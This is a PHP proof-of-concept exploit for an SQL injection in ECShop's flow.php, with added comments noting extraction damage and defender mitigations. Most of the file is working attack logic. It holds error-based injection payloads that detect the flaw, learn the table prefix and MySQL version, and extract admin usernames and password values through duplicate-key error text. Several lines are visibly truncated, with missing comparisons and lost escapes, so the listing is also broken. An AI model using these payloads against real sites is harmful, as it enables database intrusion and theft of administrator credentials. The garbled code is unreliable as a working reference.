package.php:
/*
* P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
*/
// Proof-of-concept driver for the ECShop flow.php (add_package_to_cart) SQL
// injection named in the banner. Several lines in this copy look damaged by
// extraction: the `<` comparisons on the if/for headers are missing and the
// "\n" escapes print as a bare "n", so the listing is not runnable as shown.
// Defender notes: every stage below depends on the application echoing raw
// MySQL error text ("MySQL server error report", "Duplicate entry ...") to the
// HTTP client. Not exposing database error output and parameterising the
// query behind flow.php?step=add_package_to_cart removes both the injection and
// the error-based oracle; POSTs to that step whose package_info JSON carries
// SQL keywords are a usable detection signature.
error_reporting(E_ALL & ~E_WARNING); // warnings off: undefined $m[...] reads below fail silently
ini_set('display_errors', '1');
@set_time_limit(0);
hr();
banner();
if (count($argv) // comparison truncated in this copy; presumably an argument-count check
{
usage(); // usage() is declared with a parameter ($argv0) but called with none
exit;
}
hr();
$host = $argv[1]; // CLI arguments are taken as-is for target host and base path
$path = $argv[2];
$username = array(); // filled by reference in Inject(), indexed from 1
$password = array();
exploit($host, $path); // die()s unless the error-text oracle is present
print "Getting database prefix ...n";
$pre = prefix($host, $path);
define('PRE',$pre); // table prefix used by version()/ucount()/Inject()
print "Verifying MySQL Version...n";
$version = version($host, $path); // true when information_schema is available
print "Counting admin user ...n";
$ucount = ucount($host, $path,$version); // may be null if no response matched (see ucount)
print "Admin Users : $ucountn";
for ($i=1;$i // loop bound truncated in this copy
{
print "Injecting username and password for admin $i ...n";
Inject($host, $path,$i,$username[$i],$password[$i],$version);
print "n";
}
hr();
print "*n";
print "* [+] Target Host : $host$pathn";
print "* [+] Admin Founded : $ucountn";
print "*n";
for ($i=1;$i // loop bound truncated in this copy
{
print "* [+] Username : " . $username[$i] . "n";
print "* Passowrd : " . $password[$i] . "n";
print "*n";
}
hr();
// Prints the divider line used between output sections.
// The trailing "n" is presumably a "\n" escape whose backslash was lost.
function hr()
{
print "****************************************************************************n";
}
// Prints the informational banner (target software, date, author).
// The banner is the only place the affected component (lib_common.php) is named.
function banner()
{
print "* [+] Exploit : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *n";
print "* [+] Date : 22-08-2010 *n";
print "* [+] Author : alibaba *n";
print "* [+] QQ : 1499281192 *n";
}
// Prints CLI usage. $argv0 is declared but never read, and the only call
// site (top of file) passes no argument. The placeholders after "package.php"
// on the Usage line appear to have been stripped by extraction (likely
// angle-bracketed host/path tokens).
function usage($argv0)
{
hr();
print "* [+] Usage : php package.php *n";
print "* [+] Example : php package.php www.ecshop.com / *n";
print "* [+] Example : php package.php www.ecshop.com /shop/ *n";
hr();
}
// Vulnerability check: posts a package_info JSON whose package_id contains a
// stray quote and treats the text "MySQL server error report" in the response
// as confirmation; anything else -> die("No Vulnerability").
// Note: strrpos() returns false when absent, and the negation would also
// misfire if the needle sat at offset 0 (not reachable with HTTP headers
// preceding the body). The quote inside $data looks unescaped in this copy,
// probably an extraction artefact.
// Defender note: this is a pure error-message oracle; returning a generic
// error page instead of the database error text defeats the probe.
function exploit($host, $path)
{
$url = $path . 'flow.php?step=add_package_to_cart';
$data = 'package_info={"package_id":"1'","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
die("No Vulnerability");
else
print "Vulnerability Founded!n";
}
// Recovers the table prefix from the echoed error page. If the probe does not
// produce an error, the ECShop default 'ecs_' is assumed; otherwise the
// "FROM `db`.`<prefix>package_goods`" fragment of the echoed SQL is parsed and
// the second capture group is returned ('' if the regex does not match).
// Defender note: the leak here is the verbatim SQL statement in the error
// output, which reveals database and table names; disable error echoing.
function prefix($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (!strrpos($buffer,"MySQL server error report"))
$pre = 'ecs_';
else
{
preg_match("/FROM `(.+)`.`(.+)package_goods`/i",$buffer,$m);
$pre = isset($m[2])? $m[2] : '';
}
return $pre;
}
// Decides whether information_schema is available (MySQL >= 5.0) by checking
// whether the server complains that 'information_schema.tables' doesn't exist.
// Returns true for >= 5.0, false otherwise; the print on the false branch is
// truncated in this copy. Uses the PRE constant defined by the driver script.
// Defender note: version fingerprinting again relies solely on error text
// reaching the client.
function version($host, $path)
{
$url = $path . "flow.php?step=add_package_to_cart";
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/'information_schema.tables' doesn't exist/i",$buffer))
{
print "MySQL Version
return false;
}
else
{
print "MySQL Version >= 5.0n";
return true;
}
}
// Reads the admin-user count out of a provoked "Duplicate entry '[N]1' for
// key" error (the rand()/group-by duplicate-key technique). With $version true
// a single request is made; otherwise it retries (the while bound is truncated
// in this copy) because the unseeded rand() variant does not error every time.
// Returns $m[1]; if no response ever matched, $m is never set and the return
// is null with the warning suppressed by the driver's error_reporting().
// Defender note: the value is never returned by the query itself, only inside
// the error message, so suppressing DB error output closes this channel.
function ucount($host, $path, $version)
{
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i // loop bound truncated in this copy
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
{
preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
return $m[1];
}
// Pulls one admin row (user_name and the stored password field) through the
// same duplicate-key error as ucount(), selecting row $number-1 with LIMIT.
// $username and $password are reference parameters written in place; the
// driver collects them into arrays. As in ucount(), an unmatched response
// leaves $m undefined and both outputs become null under suppressed warnings.
// Defender note: this is what turns the echoed error into a credential
// disclosure. Mitigation is the same (no DB errors to the client, a
// parameterised query), plus proper password hashing so a disclosed value is
// not directly usable.
function Inject($host, $path, $number, &$username, &$password, $version)
{
$number--;
$username = '';
$url = $path . "flow.php?step=add_package_to_cart";
if ($version)
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
}
else
{
$found = false;
$i=0;
while($found==false && $i // loop bound truncated in this copy
{
$data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
$buffer = POST($host,80,$url,$data,30);
if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
{
preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
$found = true;
}
$i++;
}
}
$username = $m[1];
$password = $m[2];
}
// Minimal HTTP/1.0 POST over a raw socket. Returns the whole response
// (headers plus body) as one string; die()s if the connection fails.
// $timeout applies to the connect only (fsockopen); the fgets() read loop has
// no timeout, so an unresponsive server can hang the script. $cookie is
// accepted but never sent. The "rn" fragments in the header lines are
// presumably "\r\n" with the backslashes lost in extraction.
function POST($host,$port,$path,$data,$timeout, $cookie='') {
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0rn");
fputs($fp, "Host: $hostrn");
fputs($fp, "Content-type: application/x-www-form-urlencodedrn");
fputs($fp, "Content-length: ".strlen($data)."rn");
fputs($fp, "Connection: closernrn");
fputs($fp, $data."rnrn");
while(!feof($fp))
{
$buffer .= fgets($fp,4096);
}
fclose($fp);
}
return $buffer;
}
?>